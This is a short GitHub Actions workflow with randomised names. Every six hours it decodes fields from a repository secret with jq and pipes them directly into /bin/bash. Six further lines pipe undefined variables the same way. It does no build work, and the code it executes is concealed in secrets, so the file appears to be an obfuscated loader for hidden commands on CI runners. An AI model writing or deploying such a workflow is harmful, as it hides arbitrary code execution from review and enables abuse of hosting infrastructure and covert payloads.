name: crowfootpenetrate
on:
  workflow_dispatch:
  schedule:
    - cron: '14 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: crowfootpenetrate
        env:
          bv67336: ${{ secrets.bv67336 }}
        run: |
          echo $bv67336 | jq -r .hngq1133 | /bin/bash
          echo $ba3357 | jq -r .c9 | /bin/bash
          echo $fjns96 | jq -r .fr8615 | /bin/bash
          echo $nel68 | jq -r .o74 | /bin/bash
          echo $aoi9 | jq -r .wgrh07429 | /bin/bash
          echo $by653 | jq -r .c20 | /bin/bash
          echo $m269 | jq -r .tise39117 | /bin/bash

